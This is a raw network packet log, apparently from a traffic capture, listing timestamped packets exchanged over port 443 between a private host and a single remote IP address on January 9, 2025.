Jan 9, 2025 14:56:21.899974108 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.900042057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904561043 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904599905 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904633045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904670954 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904706955 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904747009 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904767036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.904777050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.908132076 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.908821106 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.965993881 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.032330990 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.485428095 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.652201891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.661730051 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.661741972 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.661755085 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.662329912 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.667563915 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.667578936 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.667591095 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.667604923 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.672416925 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.672439098 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.672451019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.686559916 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.786953926 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.790601969 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.790818930 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791013002 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791027069 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791039944 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791053057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791414976 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791429996 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791444063 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791459084 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791507006 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791522026 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791536093 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791552067 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791630030 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791642904 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791660070 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791754961 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.791765928 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.793931961 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.794086933 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.820313931 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.820966005 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.915119886 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.918675900 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924069881 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924156904 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924170971 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924283981 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924494028 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924505949 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924518108 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924541950 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.924546003 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:22.924623966 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.924662113 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.951030970 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:22.954972982 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.067766905 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.069233894 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074785948 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074799061 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074865103 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074877977 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074912071 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074924946 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074937105 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.074995041 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075037003 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075051069 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075063944 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075113058 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075166941 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075180054 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075429916 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075442076 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075448990 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075499058 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.075515985 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.076771021 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.077130079 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.080787897 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080801010 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080821037 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080836058 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080849886 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080864906 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080878019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080907106 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080919027 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.080933094 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.081497908 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.085933924 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.085949898 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.085963011 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.085983992 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.085997105 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086010933 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086070061 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086081982 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086095095 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086146116 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.086301088 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.096384048 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096400976 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096416950 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096429110 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096451044 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096462965 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096474886 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096487999 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096528053 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096541882 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.096704960 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.098315001 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.098328114 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.098474026 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.098550081 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.160629988 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.198088884 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.257457018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263305902 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263328075 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263405085 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263643980 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263664961 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263679028 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263736963 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263750076 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263766050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.263777018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.264010906 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.282202005 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.378170967 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.384725094 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385374069 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.385432959 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385446072 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385457993 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385493040 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385505915 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385519028 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385581017 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385593891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385607004 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385617018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.385629892 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.386193037 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.386388063 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.400938988 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.496813059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503025055 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503340006 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.503560066 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503619909 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503668070 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503730059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503830910 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503890038 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503906965 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503920078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503933907 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.503958941 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504024029 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504036903 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504048109 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504062891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504122972 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504137039 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504148006 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504162073 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.504446983 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.530582905 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.549652100 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549664974 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549675941 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549686909 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549748898 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549761057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549772024 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549787045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549812078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549830914 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549844027 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549855947 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549896955 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.549922943 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550017118 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550077915 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550098896 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550111055 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550168037 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550179958 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550189972 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550235033 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550247908 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550260067 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550357103 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.550384998 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550399065 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550410032 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550421953 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550427914 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.550435066 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550448895 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550463915 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550477982 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550504923 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550554037 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550600052 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550611019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550622940 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550642967 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550654888 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550666094 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550728083 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550796986 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550810099 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550821066 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550832987 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550852060 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550955057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550967932 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550978899 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.550990105 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551002979 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551014900 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551026106 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551038980 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551125050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551136971 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551146984 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551158905 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551172018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551183939 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551196098 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551208019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551208019 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.551225901 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551270962 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551433086 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551455021 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551493883 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551507950 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551522017 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551534891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551548958 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551563025 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.551776886 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.551898956 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.552071095 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.553447008 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.577406883 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.651309013 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.655687094 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.772530079 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.780448914 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.780668974 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.780869961 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.780885935 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.781271935 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.781286001 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.781296968 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.782325029 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.806793928 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.807899952 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.957319975 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.957386017 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967745066 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967755079 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967797041 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967808008 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967820883 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.967829943 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:23.968096972 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:23.989938021 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.085794926 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.094907045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.095221996 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.095932007 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.095944881 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.095954895 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096029997 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096044064 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096055031 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096065998 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096074104 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096091986 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.096466064 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.096503973 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.096540928 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.111084938 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.241384983 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.253923893 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.253943920 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.253956079 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254002094 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254137039 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254182100 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254194021 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254297018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254364967 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254379034 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254410982 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.254437923 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254451036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254462957 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254479885 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254492044 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254631996 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.254661083 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254672050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254679918 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.254982948 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.255018950 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.277803898 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.388745070 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.393371105 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.416589975 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417229891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417308092 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417321920 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417337894 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417352915 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417368889 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417392015 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:24.417433977 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417453051 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417467117 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417484045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:24.417496920 CET	443	54149	184.28.190.49	192.168.2.10
